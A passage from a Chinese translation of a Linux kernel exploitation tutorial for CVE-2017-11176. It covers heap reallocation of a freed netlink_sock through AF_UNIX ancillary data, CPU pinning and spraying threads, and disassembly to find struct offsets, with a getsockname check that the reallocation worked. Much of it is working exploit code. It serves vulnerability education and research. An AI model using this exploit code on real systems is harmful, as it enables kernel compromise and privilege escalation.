还有其他的执行路径可以考虑，kmalloc()也是如此。。。考虑了这么多问题，你的所要执行的工作在系统中是孤独的。但是故事不会在这里停下。

这儿有其他的任务（包括内核的）同时使用kmalloc-1024的cache。你在和他们赛跑。一场你会输的赛跑。。。

举个例子，你是释放了netlink_sock对象，但是其他的任务也释放了一个kmalloc-1024对象。即，你系那个会需要去申请两次去重新发呢配netlink_sock(LIFO)。如果其他的作业偷走了他（跑赢了你）？当然。。。你无论如何不能去重分配他直到非常相同的任务不会返回（同时希望这个任务不会被转移动到其他cpu。。。）不过，如何去察觉他？

正如你所看到的，很多事情会出错。这是exp中最关键的一步：释放netlink_sock对象后和再分配他之前。我们不能解决文章中的所有问题。这个更高级的exp，他要求更强大的内核知识。可靠的重定位是一个复杂的主题。

无论怎么样，让我们用两个基础的技巧去解决一些上述的问题：

用sched_setaffinity()的syscall定位cpu。array_cache是一个per-CPU的数据结构。如果你再攻击开始前把cpu掩码设置为单个cpu，你就能确保你用的是同一个array_cachce当你释放和再分配时。
堆喷射。通过再分配许多，我们有一个机会去再分配到netlink_sock对象即使其他任务也在释放kmalloc-1024对象。作为补充，如果netlink_sock的slab时被放在已释放的slab队列的最后，我们尽力去在分配所有的直到一个cache_grow()

最终出现。无论怎样，这是纯猜想（记住基础的技巧）。

请检查执行节去看看他是怎么完成的吧。

5-5 一个新希望

你被上一节吓到了？不要担心，我们现在很幸运。我们要释放的对象(struct netlink_sock)是位于kmalloc-1024。这是个令人惊讶的cache，因为没有被在内核中用的很多。为了去说服你，执行上面“method #5”的穷人方法（？？？），即查找对象尺寸，观察各种各样的普遍内核内存kmemcaches：

watch -n 0.1 'sudo cat /proc/slabinfo | egrep "kmalloc-|size-" | grep -vi dma'

看？他根本没怎么动。现在看看 “kmalloc-256”, “kmalloc-192”, “kmalloc-64”, “kmalloc-32”。这些事坏人。。。他们只是最常见的内核对象大小。在这些cache里面利用UAF简直事地狱。当然，“kmalloc的活动”取决于你的目标和你在上面运行的方法。但是
，以前的缓冲在所有系统上都是不稳定的。

5-6 再分配执行

好了，是时候去回到我们的poc然后开始编写再分配了。

让我们解决array_cache 的问题通过把我们所有的线程迁移到cup#0：

static int migrate_to_cpu0(void)
{cpu_set_t set;CPU_ZERO(&set);CPU_SET(0, &set);if (_sched_setaffinity(_getpid(), sizeof(set), &set) == -1){perror("[-] sched_setaffinity");return -1;}return 0;
}

下一步，我们想要去检查我们可以使用辅助数据缓存的原语，让我们探究最理想的内核参数（optmem_max sysctl）的值（通过procfs进程文件系统）：

static bool can_use_realloc_gadget(void)
{int fd;int ret;bool usable = false;char buf[32];if ((fd = _open("/proc/sys/net/core/optmem_max", O_RDONLY)) < 0){perror("[-] open");// TODO: fallback to sysctl syscallreturn false; // we can't conclude, try it anyway or not ?}memset(buf, 0, sizeof(buf));if ((ret = _read(fd, buf, sizeof(buf))) <= 0){perror("[-] read");goto out;}printf("[ ] optmem_max = %s", buf);if (atol(buf) > 512) // only test if we can use the kmalloc-1024 cacheusable = true;out:_close(fd);return usable;
}

下一步是准备控制信息缓存区。请注意g_realloc_data 是全局申明的，所以每一个线程可以访问他。设置正好的cmsg字段（就是cmsghdr结构体）：
ps：cmsghdr见 https://www.cnblogs.com/huyc/archive/2011/12/05/2276827.html

#define KMALLOC_TARGET 1024static volatile char g_realloc_data[KMALLOC_TARGET];static int init_realloc_data(void)
{struct cmsghdr *first;memset((void*)g_realloc_data, 0, sizeof(g_realloc_data));// necessary to pass checks in __scm_send()first = (struct cmsghdr*) g_realloc_data;first->cmsg_len = sizeof(g_realloc_data);first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsgfirst->cmsg_type = 1; // <---- ARBITRARY VALUE// TODO: do something useful will the remaining bytes (i.e. arbitrary call)return 0;
}

因为我们将会重分配AF_UNIX（负责进程间通信）套接字，我们需要区准备他们。我们将会为了每一个再分配的线程创建一对套接字。这里，我们创造一个特殊的unix socket：abstract sockets（man 7 unix）。即他们的地址从null字节开始（’@’ in netstat）。这不是强制的，仅仅是一个偏好。发送套接字连接接收套接字然后结束，我们通过setsockopt()设置timeout 是MAX_SCHEDULE_TIMEOUT ：
ps：
AF_UNIX见 https://www.cnblogs.com/shangerzhong/p/9153737.html
sockaddr_un见 https://blog.csdn.net/gladyoucame/article/details/8768731

struct realloc_thread_arg
{pthread_t tid;int recv_fd;int send_fd;struct sockaddr_un addr;    //本地进程间通信的一种套接字
};static int init_unix_sockets(struct realloc_thread_arg * rta)
{struct timeval tv;static int sock_counter = 0;if (((rta->recv_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) ||((rta->send_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0)){perror("[-] socket");goto fail;}// bind an "abstract" socket (first byte is NULL)memset(&rta->addr, 0, sizeof(rta->addr));rta->addr.sun_family = AF_UNIX;    //sun_family只能是AF_LOCAL或AF_UNIXsprintf(rta->addr.sun_path + 1, "sock_%lx_%d", _gettid(), ++sock_counter);if (_bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr))){perror("[-] bind");goto fail;}if (_connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr))){perror("[-] connect");goto fail;}// set the timeout value to MAX_SCHEDULE_TIMEOUTmemset(&tv, 0, sizeof(tv));if (_setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))){perror("[-] setsockopt");goto fail;}return 0;fail:// TODO: release everythingprintf("[-] failed to initialize UNIX sockets!\n");return -1;
}

ps：sockaddr_un，见https://blog.csdn.net/gladyoucame/article/details/8768731

一旦开始，再分配线程准备通过用MSG_DONTWAIT 填充接收缓存区来阻塞发送缓冲区，然后锁定直到"big GO"（再分配）

static volatile size_t g_nb_realloc_thread_ready = 0;
static volatile size_t g_realloc_now = 0;static void* realloc_thread(void *arg)
{struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg;struct msghdr mhdr;char buf[200];// initialize msghdrstruct iovec iov = {.iov_base = buf,.iov_len = sizeof(buf),};memset(&mhdr, 0, sizeof(mhdr));mhdr.msg_iov = &iov;mhdr.msg_iovlen = 1;// the thread should inherit main thread cpumask, better be sure and redo-it!if (migrate_to_cpu0())goto fail;// make it blockwhile (_sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0);if (errno != EAGAIN){ perror("[-] sendmsg");goto fail;}// use the arbitrary data nowiov.iov_len = 16; // don't need to allocate lots of memory in the receive queuemhdr.msg_control = (void*)g_realloc_data; // use the ancillary data buffermhdr.msg_controllen = sizeof(g_realloc_data);g_nb_realloc_thread_ready++;while (!g_realloc_now) // spinlock until the big GO!;// the next call should block while "reallocating"if (_sendmsg(rta->send_fd, &mhdr, 0) < 0){perror("[-] sendmsg");goto fail;}return NULL;fail:printf("[-] REALLOC THREAD FAILURE!!!\n");return NULL;
}

再分配线程将会通过g_realloc_now进行自旋锁，直到主线程告诉他们去开始用realloc_NOW() 再分配（让他内联化很重要，减少消耗的时间）：

// keep this inlined, we can't loose any time (critical path)
static inline __attribute__((always_inline)) void realloc_NOW(void)
{g_realloc_now = 1;_sched_yield(); // don't run me, run the reallocator threads!sleep(5);
}

系统调用sched_yield()强制主线程被抢占。幸运的是，下一个预定的线程将会是我们再分配线程中的一个，由此赢得再分配比赛。

最后，main()变成：

int main(void)
{int sock_fd  = -1;int sock_fd2 = -1;int unblock_fd = 1;struct realloc_thread_arg rta[NB_REALLOC_THREADS];printf("[ ] -={ CVE-2017-11176 Exploit }=-\n");if (migrate_to_cpu0()){printf("[-] failed to migrate to CPU#0\n");goto fail;}printf("[+] successfully migrated to CPU#0\n");memset(rta, 0, sizeof(rta));if (init_reallocation(rta, NB_REALLOC_THREADS)){printf("[-] failed to initialize reallocation!\n");goto fail;}printf("[+] reallocation ready!\n");if ((sock_fd = prepare_blocking_socket()) < 0)goto fail;printf("[+] netlink socket created = %d\n", sock_fd);if (((unblock_fd = _dup(sock_fd)) < 0) || ((sock_fd2 = _dup(sock_fd)) < 0)){perror("[-] dup");goto fail;}printf("[+] netlink fd duplicated (unblock_fd=%d, sock_fd2=%d)\n", unblock_fd, sock_fd2);// trigger the bug twice AND immediatly realloc!if (decrease_sock_refcounter(sock_fd, unblock_fd) ||decrease_sock_refcounter(sock_fd2, unblock_fd)){goto fail;}realloc_NOW();printf("[ ] ready to crash?\n");PRESS_KEY();close(unblock_fd);printf("[ ] are we still alive ?\n");PRESS_KEY();// TODO: exploitreturn 0;fail:printf("[-] exploit failed!\n");PRESS_KEY();return -1;
}

你可以现在跑这个exp，但是你不会看到任何效果。我们仍然再net_release()期间crash。我们将会修复这个在下一节。

6.利用（任意调用）

“Where there is a will, there is way…”

在之前的节中，我们：
1.解释了再分配和类型混淆的基础
2.收集我们自己的UAF信息和识别悬空指针
3.明白我们可以任意的触发和控制UAF
4.实行在分配

是时候去把所有的混合在一起然后利用UAF。牢记一点：
最后的目标是去控制内核的执行流程。

申明支配内核实际的流程？像其他问题一样，指针：RIP(amd64)，PC(arm)。

就像我们在核心内容中看到的一样，内核有很多VFT(虚函数表)和函数指针去实现一些泛型。重写和调用他们去控制执行流程即我们将会在这儿做什么。

6-1 The Primitive Gates（不知道怎么翻译？原始门？）

让我们回到我们的UAF原语。在一个之前的节，我们看到我们可以控制（和触发）UAF通过调用close(unblock_fd)。另外，我们看到struct socket中的sk字段时一个悬空指针。两者之间的关系时VFTs：
struct file_operations socket_file_ops：系统调用close()到sock_close()。
struct proto_ops netlink_ops：sock_close() 到 netlink_release() (大量使用sk)

这些VFT是我们的primitive gates（基本单元？）：每一个简单的UAF都是从这些函数指针中的一个开始的。

无论怎样，我们不能精确的控制这些指针。原因是free的结构体是struct netlink_sock。相反，指向VFTs的指针分别存在于struct file和struct socket。我们将会利用VFT提供的原始的功能。

举个例子，让我们看一下netlink_getname()（来自netlink_ops），它可以被很直接的调用追踪访问到。

- SYSCALL_DEFINE3(getsockname, ...) // calls sock->ops->getname()
- netlink_getname()static int netlink_getname(struct socket *sock, struct sockaddr *addr,int *addr_len, int peer)
{struct sock *sk = sock->sk;                                 // <----- DANGLING POINTERstruct netlink_sock *nlk = nlk_sk(sk);                      // <----- DANGLING POINTERstruct sockaddr_nl *nladdr = (struct sockaddr_nl *)addr;    // <----- will be transmitted to userlandnladdr->nl_family = AF_NETLINK;nladdr->nl_pad = 0;*addr_len = sizeof(*nladdr);if (peer) {                                                 // <----- set to zero by getsockname() syscallnladdr->nl_pid = nlk->dst_pid;nladdr->nl_groups = netlink_group_mask(nlk->dst_group);} else {nladdr->nl_pid = nlk->pid;                                // <----- uncontrolled read primitivenladdr->nl_groups = nlk->groups ? nlk->groups[0] : 0;     // <----- uncontrolled read primitive}return 0;
}

当然，这是一个很好的不受控制的阅读原语（两个读，没有副作用）。我们将会使用他去改善exp的可靠性为了去检查再分配成功。

6-2 再分配检查执行：

让我们开始使用先前的原语和检查是否再分配成功！我们怎么做这个？这儿是我们的计划：

找到nlk->pid和nlk->groups的偏移。
写一些特殊的值在我们的在分配数据区域。（init_realloc_data()）
调用系统调用getsockname（）然后检查返回值。

如果返回地址匹配我们的特殊值，那就意味着再分配起作用，我们有攻击我们的第一个UAF原语（无法控制的读）。你不是总有机会验证再分配是否有效。

为了找到nlk->pid和nlk->groups的偏移，我们首先需要去得到未压缩的二进制文件流。如果你不知道怎么去做，查看这个链接（https://blog.packagecloud.io/eng/2016/03/08/how-to-extract-and-disassmble-a-linux-kernel-image-vmlinuz/）你也应该打开“/boot/System.map-$(uname -r)”文件。如果（由于任何原因）你没有访问这个文件，你可以尝试“/proc/kallsyms”，这个会给你一些结果（需要root权限）。

好了，我们准备好去分解我们的内核了。linux内核本质上就是一个ELF二进制文件。因此你可以用优秀的二进制工具，像objdump。

为了去发现nlk->pid 和 nlk->groups的偏移当他们被使用在netlink_getname()函数上的时候。让我们拆解他！首先用System.map文件找出netlink_getname()的地址：

$ grep "netlink_getname" System.map-2.6.32
ffffffff814b6ea0 t netlink_getname

在我们的例子中，netlink_getname()函数将会被加载到地址0xffffffff814b6ea0

NOTE：我们假设KASLR没有开启。

下一步，用一个反汇编工具打开vmlinux（不是vmlinuZ），然后分析 netlink_getname()函数。

ffffffff814b6ea0:       55                      push   rbp
ffffffff814b6ea1:       48 89 e5                mov    rbp,rsp
ffffffff814b6ea4:       e8 97 3f b5 ff          call   0xffffffff8100ae40
ffffffff814b6ea9:       48 8b 47 38             mov    rax,QWORD PTR [rdi+0x38]
ffffffff814b6ead:       85 c9                   test   ecx,ecx
ffffffff814b6eaf:       66 c7 06 10 00          mov    WORD PTR [rsi],0x10
ffffffff814b6eb4:       66 c7 46 02 00 00       mov    WORD PTR [rsi+0x2],0x0
ffffffff814b6eba:       c7 02 0c 00 00 00       mov    DWORD PTR [rdx],0xc
ffffffff814b6ec0:       74 26                   je     0xffffffff814b6ee8
ffffffff814b6ec2:       8b 90 8c 02 00 00       mov    edx,DWORD PTR [rax+0x28c]
ffffffff814b6ec8:       89 56 04                mov    DWORD PTR [rsi+0x4],edx
ffffffff814b6ecb:       8b 88 90 02 00 00       mov    ecx,DWORD PTR [rax+0x290]
ffffffff814b6ed1:       31 c0                   xor    eax,eax
ffffffff814b6ed3:       85 c9                   test   ecx,ecx
ffffffff814b6ed5:       74 07                   je     0xffffffff814b6ede
ffffffff814b6ed7:       83 e9 01                sub    ecx,0x1
ffffffff814b6eda:       b0 01                   mov    al,0x1
ffffffff814b6edc:       d3 e0                   shl    eax,cl
ffffffff814b6ede:       89 46 08                mov    DWORD PTR [rsi+0x8],eax
ffffffff814b6ee1:       31 c0                   xor    eax,eax
ffffffff814b6ee3:       c9                      leave
ffffffff814b6ee4:       c3                      ret
ffffffff814b6ee5:       0f 1f 00                nop    DWORD PTR [rax]
ffffffff814b6ee8:       8b 90 88 02 00 00       mov    edx,DWORD PTR [rax+0x288]
ffffffff814b6eee:       89 56 04                mov    DWORD PTR [rsi+0x4],edx
ffffffff814b6ef1:       48 8b 90 a0 02 00 00    mov    rdx,QWORD PTR [rax+0x2a0]
ffffffff814b6ef8:       31 c0                   xor    eax,eax
ffffffff814b6efa:       48 85 d2                test   rdx,rdx
ffffffff814b6efd:       74 df                   je     0xffffffff814b6ede
ffffffff814b6eff:       8b 02                   mov    eax,DWORD PTR [rdx]
ffffffff814b6f01:       89 46 08                mov    DWORD PTR [rsi+0x8],eax
ffffffff814b6f04:       31 c0                   xor    eax,eax
ffffffff814b6f06:       c9                      leave
ffffffff814b6f07:       c3                      ret

让我们把程序集合拆分成更小块来匹配我们的原始netlink_getname()函数（注意System V ABI）。最重要的事情去记住是参数传递顺序（我们仅仅有4个参数，在这儿）。

rdi: struct socket *sock
rsi: struct sockaddr *addr
rdx: int *addr_len
rcx: int peer

让我们继续走，首先我们有开场，0xffffffff8100ae40的调用时空。（在反汇编中查看）

ffffffff814b6ea0:       55                      push   rbp
ffffffff814b6ea1:       48 89 e5                mov    rbp,rsp
ffffffff814b6ea4:       e8 97 3f b5 ff          call   0xffffffff8100ae40   // <---- NOP

下一步，我们有公共部分netlink_getname()，在ASM：

ffffffff814b6ea9:       48 8b 47 38             mov    rax,QWORD PTR [rdi+0x38] // retrieve "sk"
ffffffff814b6ead:       85 c9                   test   ecx,ecx                  // test "peer" value
ffffffff814b6eaf:       66 c7 06 10 00          mov    WORD PTR [rsi],0x10      // set "AF_NETLINK"
ffffffff814b6eb4:       66 c7 46 02 00 00       mov    WORD PTR [rsi+0x2],0x0   // set "nl_pad"
ffffffff814b6eba:       c7 02 0c 00 00 00       mov    DWORD PTR [rdx],0xc      // sizeof(*nladdr)

代码分支由peer的值决定：

ffffffff814b6ec0:       74 26                   je     0xffffffff814b6ee8 // "if (peer)"

如果peer不是0（不是我们的例子），那么这儿就都是我们可无视的代码：

ffffffff814b6ec2:       8b 90 8c 02 00 00       mov    edx,DWORD PTR [rax+0x28c]    // ignore
ffffffff814b6ec8:       89 56 04                mov    DWORD PTR [rsi+0x4],edx      // ignore
ffffffff814b6ecb:       8b 88 90 02 00 00       mov    ecx,DWORD PTR [rax+0x290]    // ignore
ffffffff814b6ed1:       31 c0                   xor    eax,eax                      // ignore
ffffffff814b6ed3:       85 c9                   test   ecx,ecx                      // ignore
ffffffff814b6ed5:       74 07                   je     0xffffffff814b6ede           // ignore
ffffffff814b6ed7:       83 e9 01                sub    ecx,0x1                      // ignore
ffffffff814b6eda:       b0 01                   mov    al,0x1                       // ignore
ffffffff814b6edc:       d3 e0                   shl    eax,cl                       // ignore
ffffffff814b6ede:       89 46 08                mov    DWORD PTR [rsi+0x8],eax      // set "nladdr->nl_groups"
ffffffff814b6ee1:       31 c0                   xor    eax,eax                      // return code == 0
ffffffff814b6ee3:       c9                      leave
ffffffff814b6ee4:       c3                      ret
ffffffff814b6ee5:       0f 1f 00                nop    DWORD PTR [rax]

剩下的小阻碍，就是下面的代码：

ffffffff814b6ee8:       8b 90 88 02 00 00       mov    edx,DWORD PTR [rax+0x288]  // retrieve "nlk->pid"
ffffffff814b6eee:       89 56 04                mov    DWORD PTR [rsi+0x4],edx    // give it to "nladdr->nl_pid"
ffffffff814b6ef1:       48 8b 90 a0 02 00 00    mov    rdx,QWORD PTR [rax+0x2a0]  // retrieve "nlk->groups"
ffffffff814b6ef8:       31 c0                   xor    eax,eax
ffffffff814b6efa:       48 85 d2                test   rdx,rdx                    // test if "nlk->groups" it not NULL
ffffffff814b6efd:       74 df                   je     0xffffffff814b6ede         // if so, set "nl_groups" to zero
ffffffff814b6eff:       8b 02                   mov    eax,DWORD PTR [rdx]        // otherwise, deref first value of "nlk->groups"
ffffffff814b6f01:       89 46 08                mov    DWORD PTR [rsi+0x8],eax    // ...and put it into "nladdr->nl_groups"
ffffffff814b6f04:       31 c0                   xor    eax,eax                    // return code == 0
ffffffff814b6f06:       c9                      leave
ffffffff814b6f07:       c3                      ret

好了，我们有所有我们需要的事了。
nlk->pid的偏移是0x288在"struct netlink_sock"
nlk->groups的偏移是0x2a0在"struct netlink_sock"

为了去检查是否再分配成功，我们将会设置pid的值为0x11a5dcee
（任意的值）和group的值为0（否则他将会被取消引用）。让我们，设置这些值在我们的任意数据数组中（g_realloc_data）。

#define MAGIC_NL_PID 0x11a5dcee
#define MAGIC_NL_GROUPS 0x0// target specific offset
#define NLK_PID_OFFSET      0x288
#define NLK_GROUPS_OFFSET   0x2a0static int init_realloc_data(void)
{struct cmsghdr *first;int* pid = (int*)&g_realloc_data[NLK_PID_OFFSET];void** groups = (void**)&g_realloc_data[NLK_GROUPS_OFFSET];memset((void*)g_realloc_data, 'A', sizeof(g_realloc_data));// necessary to pass checks in __scm_send()first = (struct cmsghdr*) &g_realloc_data;first->cmsg_len = sizeof(g_realloc_data);first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsgfirst->cmsg_type = 1; // <---- ARBITRARY VALUE*pid = MAGIC_NL_PID;*groups = MAGIC_NL_GROUPS;// TODO: do something useful will the remaining bytes (i.e. arbitrary call)return 0;
}

再分配数据布局：

然后检查我们用getsockname()找回这些值。

static bool check_realloc_succeed(int sock_fd, int magic_pid, unsigned long magic_groups)
{struct sockaddr_nl addr;size_t addr_len = sizeof(addr);memset(&addr, 0, sizeof(addr));// this will invoke "netlink_getname()" (uncontrolled read)if (_getsockname(sock_fd, &addr, &addr_len)){perror("[-] getsockname");goto fail;}printf("[ ] addr_len = %lu\n", addr_len);printf("[ ] addr.nl_pid = %d\n", addr.nl_pid);printf("[ ] magic_pid = %d\n", magic_pid);if (addr.nl_pid != magic_pid){printf("[-] magic PID does not match!\n");goto fail;}if (addr.nl_groups != magic_groups) {printf("[-] groups pointer does not match!\n");goto fail;}return true;fail:return false;
}

最后，在main()里面调用：

int main(void)
{// ... cut ...realloc_NOW();if (!check_realloc_succeed(unblock_fd, MAGIC_NL_PID, MAGIC_NL_GROUPS)){printf("[-] reallocation failed!\n");// TODO: retry the exploitgoto fail;}printf("[+] reallocation succeed! Have fun :-)\n");// ... cut ...
}

现在重启exp，再分配成功，你应该可以看到信息"[+] reallocation succeed! Have fun